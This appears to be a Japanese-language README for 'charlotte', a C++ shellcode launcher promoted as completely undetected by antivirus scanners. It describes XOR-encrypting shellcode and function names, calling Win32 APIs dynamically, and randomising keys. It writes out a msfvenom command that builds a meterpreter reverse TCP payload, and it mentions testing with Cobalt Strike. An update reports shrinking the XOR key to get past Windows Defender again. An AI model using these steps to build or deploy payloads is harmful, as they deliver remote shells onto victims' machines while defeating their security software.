charlotte
C++ 完全検出回避シェルコードランチャー ;)
これをリリースするのは、私の新生児の誕生を祝うためです
説明
2021/05/13:
- C++ シェルコードランチャー、2021年5月13日現在、完全未検出 0/26。
- Win32 API 関数の動的呼び出し
- シェルコードと関数名の XOR 暗号化
- 実行ごとにランダム化された XOR キーと変数
- Kali Linux では、単に 'apt-get install mingw-w64*' で完了です!
2021/05/17:
- ランダムな文字列長と XOR キー長
antiscan.me

使い方
リポジトリをクローンし、シェルコードファイルを beacon.bin という名前で生成し、charlotte.py を実行します。
例:
- git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
- cd charlotte
- msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
- python charlotte.py
- 完了
msfvenom -p でテスト済み(下の .gif POC に表示)および cobalt strike raw 形式ペイロードでもテスト済み

アップデート v1.1
2021/05/17:
どうやら Microsoft Windows Defender が .DLL バイナリを検出できていたようです。
どのようにフラグを立てたか?それは16バイトサイズの XOR キーをいくつか探していたからです。
下の POC .gif に示すように、それを9に変更すると、再び未検出になることが確認できました。
乾杯!
